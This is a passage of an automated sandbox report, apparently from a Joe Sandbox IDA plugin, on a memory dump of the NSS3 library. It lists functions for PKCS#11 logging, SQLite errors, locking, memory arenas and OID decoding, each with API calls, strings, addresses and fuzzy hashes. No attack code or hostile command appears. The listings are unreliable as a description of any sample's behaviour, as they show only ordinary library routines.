String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: a1f21d8e3fd179aae89ac819808e3481aac62e2786f48768a296e21a5d96b502
Instruction ID: 5c346b954767931393869bf2e099b7f1d33d2f1019140e746e4a4c5e624d0dca
Opcode Fuzzy Hash: a1f21d8e3fd179aae89ac819808e3481aac62e2786f48768a296e21a5d96b502
Instruction Fuzzy Hash: 8D312B76602205AFCB048F54ED48FAA3775BB5130DF048C25E4096BB92DF34D849CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 6CA24C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CA24CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA24CFD
sqlite3_value_text16.NSS3(?), ref: 6CA24D44

Strings

out of memory, xrefs: 6CA24C78, 6CA24C9E
invalid, xrefs: 6CA24CF1
bad parameter or other API misuse, xrefs: 6CA24D05
abort due to ROLLBACK, xrefs: 6CA24D27, 6CA24D33
another row available, xrefs: 6CA24D20
no more rows available, xrefs: 6CA24D2E
API call with %s database connection pointer, xrefs: 6CA24CF6
unknown error, xrefs: 6CA24D56

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: e66c79a49fb5326b7fabc94a61a0f08149daa8e655cb9bb2bfc59352c188ea16
Instruction ID: 9b9abe96b142ab07b0a8398788bf258f856b8086dc4df9d63ff081105472ca62
Opcode Fuzzy Hash: e66c79a49fb5326b7fabc94a61a0f08149daa8e655cb9bb2bfc59352c188ea16
Instruction Fuzzy Hash: 1B317A73F09A32A7D70C4A2CA8007A577327B82318F1D4129D8254BF54C7ACECD287E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C982DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C982DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C982E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C982E33

Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963

PR_LogPrint.NSS3(?,00000000), ref: 6C982E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C982E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C982E81

Strings

hSession = 0x%x, xrefs: 6C982E0E, 6C982E1E
C_InitPIN, xrefs: 6C982DF1
pPin = 0x%p, xrefs: 6C982E63
(CK_INVALID_HANDLE), xrefs: 6C982E2C
ulPinLen = %d, xrefs: 6C982E7C

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: d7e243d5ebf3779f581eeb3859f3dcc388d9c6a53c467ad5328611103033f501
Instruction ID: 7863aaeb245b30e1fc0a7c934fd2da26ae1bfbe43f6145c321578dabe9073a20
Opcode Fuzzy Hash: d7e243d5ebf3779f581eeb3859f3dcc388d9c6a53c467ad5328611103033f501
Instruction Fuzzy Hash: 6D3148B5602605AFCB148F51ED4CB4A7B75FB5231CF048521E809ABB62DB30C88DCBB9

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F2450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C8F24BA
LeaveCriticalSection.KERNEL32(?), ref: 6C8F250D
EnterCriticalSection.KERNEL32(?), ref: 6C8F2554
LeaveCriticalSection.KERNEL32(?), ref: 6C8F25A7
EnterCriticalSection.KERNEL32(?), ref: 6C8F2609
LeaveCriticalSection.KERNEL32(?), ref: 6C8F265F
EnterCriticalSection.KERNEL32(?), ref: 6C8F26A2
LeaveCriticalSection.KERNEL32(?), ref: 6C8F26F5
EnterCriticalSection.KERNEL32(?), ref: 6C8F2764
LeaveCriticalSection.KERNEL32(?), ref: 6C8F2898
EnterCriticalSection.KERNEL32(?), ref: 6C8F28D0
EnterCriticalSection.KERNEL32(?), ref: 6C8F2948
LeaveCriticalSection.KERNEL32(?), ref: 6C8F299B
EnterCriticalSection.KERNEL32(?), ref: 6C8F29E2
LeaveCriticalSection.KERNEL32(?), ref: 6C8F2A31

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 67bc65c3f78e48389771128ee8eaee216846f6783744f37f4dd3790af733ac3d
Instruction ID: 6b1bef85a6a8491cb29b8de112e9ae839436cb1b50aa0f593f0cc76155073004
Opcode Fuzzy Hash: 67bc65c3f78e48389771128ee8eaee216846f6783744f37f4dd3790af733ac3d
Instruction Fuzzy Hash: CEF1E031B413568BDB2C9FA1FA9DA6E3770BB07314B18852CD92657610CB3DE843CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6C972C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C973F23,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C62
EnterCriticalSection.KERNEL32(0000001C,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C76
PL_HashTableLookup.NSS3(00000000,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C93

Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23), ref: 6C972CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?), ref: 6C972CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?), ref: 6C972D4D
EnterCriticalSection.KERNEL32(?), ref: 6C972D61
PL_HashTableLookup.NSS3(?,?), ref: 6C972D71
PR_Unlock.NSS3(?), ref: 6C972D7E

Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: ae2a88f71a183a6b754ef714959efbd313854994c16e93918c9046b0134d7533
Instruction ID: 49d98bcd8ff38dc8a056c9ead0c27d89e0fb92f8db26ee01556f9829fb3999c6
Opcode Fuzzy Hash: ae2a88f71a183a6b754ef714959efbd313854994c16e93918c9046b0134d7533
Instruction Fuzzy Hash: 5A51F5B6D00606EBEB109F24EC458AA77B8BF2925CB048524ED1897B11F732E965C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8D4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D97
PR_Lock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4DBA
PR_WaitCondVar.NSS3 ref: 6C8D4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4DEF

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 4294cfb6b5ec857b2d604bcec93898b456567aa68318db882aa3c429070d35bf
Instruction ID: 1a86797efef51373ef3ba6b2a173a03a54e82ebf1b21611eb72370cef56cc2ae
Opcode Fuzzy Hash: 4294cfb6b5ec857b2d604bcec93898b456567aa68318db882aa3c429070d35bf
Instruction Fuzzy Hash: FA41A0B1A04716CFCB14AF78D5841A97BF0BF85318F068A69D898DB710E730E895CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6C99ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C99DE64), ref: 6C99ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C99ED22

Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095

PL_FreeArenaPool.NSS3(?), ref: 6C99ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C99ED6B
PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C99ED38

Part of subcall function 6C8D4C70: TlsGetValue.KERNEL32(?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4C97
Part of subcall function 6C8D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CB0
Part of subcall function 6C8D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C99ED52
PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C99ED83
PL_FreeArenaPool.NSS3(?), ref: 6C99ED95
PL_FinishArenaPool.NSS3(?), ref: 6C99ED9D

Part of subcall function 6C9B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C9B127C,00000000,00000000,00000000), ref: 6C9B650E

Strings

security, xrefs: 6C99ED06

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: c41ce79526c6f1a517e48b5c544bf99a38dd14f1a94d74345c32829bacaad296
Instruction ID: 21e7ecaeab3166c04d19082076f5b8464b9009831af4eb4f11deb8ef31b2fda1
Opcode Fuzzy Hash: c41ce79526c6f1a517e48b5c544bf99a38dd14f1a94d74345c32829bacaad296
Instruction Fuzzy Hash: A8116A759002087BE7105B25AC84BBBB27CBFA260CF090939E80472E60FB35F50CC6E6

Uniqueness

Uniqueness Score: -1.00%

Function 6C982CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C982CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C982D07

Part of subcall function 6CA609D0: PR_Now.NSS3 ref: 6CA60A22
Part of subcall function 6CA609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA60A35
Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA60A66
Part of subcall function 6CA609D0: PR_GetCurrentThread.NSS3 ref: 6CA60A70
Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA60A9D
Part of subcall function 6CA609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA60AC8
Part of subcall function 6CA609D0: PR_vsmprintf.NSS3(?,?), ref: 6CA60AE8
Part of subcall function 6CA609D0: EnterCriticalSection.KERNEL32(?), ref: 6CA60B19
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60B48
Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60C76
Part of subcall function 6CA609D0: PR_LogFlush.NSS3 ref: 6CA60C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C982D22

Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60B88
Part of subcall function 6CA609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA60C5D
Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CA60C8D
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60C9C
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60CD1
Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60CEC
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60CFB
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60D16
Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CA60D26
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D35
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CA60D65
Part of subcall function 6CA609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CA60D70
Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60D90
Part of subcall function 6CA609D0: free.MOZGLUE(00000000), ref: 6CA60D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C982D3B

Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60BAB
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60BBA
Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C982D54

Part of subcall function 6CA609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA60BCB
Part of subcall function 6CA609D0: EnterCriticalSection.KERNEL32(?), ref: 6CA60BDE
Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60C16

Strings

slotID = 0x%x, xrefs: 6C982D02
pPin = 0x%p, xrefs: 6C982D1D
pLabel = 0x%p, xrefs: 6C982D4F
ulPinLen = %d, xrefs: 6C982D36
C_InitToken, xrefs: 6C982CE7

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 4abd0c1d35ddd4d5b5cff93d1ee45e35aa1ffae594af3dcf7780bd8dcccfb6fc
Instruction ID: 49af8bccaf295cc4425e6a2361a4cfffc08fac642815fce675d60944f4078178
Opcode Fuzzy Hash: 4abd0c1d35ddd4d5b5cff93d1ee45e35aa1ffae594af3dcf7780bd8dcccfb6fc
Instruction Fuzzy Hash: 1D213A76202241EFDB049F50EE4CA457FB6FB5231DF04C621E90897A32D730C88ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 6C9C4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C9C4DCB

Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C9C4DE1

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C9C4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C9C4E59

Part of subcall function 6C9AFAB0: free.MOZGLUE(?,-00000001,?,?,6C94F673,00000000,00000000), ref: 6C9AFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA8300C,00000000), ref: 6C9C4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C9C4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C9C4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9C521A

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: f13c6470cf37a720da6b824022c692912ee6248f58680015d0f4c7d1da829a7c
Instruction ID: 1bece8054f8f4e81de5a6f410e5846e3edce538ffc0ecf50ba3fcf6dda477063
Opcode Fuzzy Hash: f13c6470cf37a720da6b824022c692912ee6248f58680015d0f4c7d1da829a7c
Instruction Fuzzy Hash: 8EF18A71F0120ACBDB08CF54D8407AEB7B6BF48358F258129E915AB781E775E981CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C9C0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C9C2C2A), ref: 6C9C0C81

Part of subcall function 6C9ABE30: SECOID_FindOID_Util.NSS3(6C96311B,00000000,?,6C96311B,?), ref: 6C9ABE44

Part of subcall function 6C998500: SECOID_GetAlgorithmTag_Util.NSS3(6C9995DC,00000000,00000000,00000000,?,6C9995DC,00000000,00000000,?,6C977F4A,00000000,?,00000000,00000000), ref: 6C998517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C9C0CC4

Part of subcall function 6C9AFAB0: free.MOZGLUE(?,-00000001,?,?,6C94F673,00000000,00000000), ref: 6C9AFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C9C0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C9C0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C9C0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C9C0D7D
free.MOZGLUE(00000000), ref: 6C9C0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C9C0DC1
free.MOZGLUE(00000000), ref: 6C9C0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C9C0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C9C0E0F

Part of subcall function 6C9995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C977F4A,00000000,?,00000000,00000000), ref: 6C9995E0
Part of subcall function 6C9995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C977F4A,00000000,?,00000000,00000000), ref: 6C9995F5
Part of subcall function 6C9995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C999609
Part of subcall function 6C9995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C99961D
Part of subcall function 6C9995C0: PK11_GetInternalSlot.NSS3 ref: 6C99970B
Part of subcall function 6C9995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C999756
Part of subcall function 6C9995C0: PK11_GetIVLength.NSS3(?), ref: 6C999767
Part of subcall function 6C9995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C99977E
Part of subcall function 6C9995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C99978E

Memory Dump Source

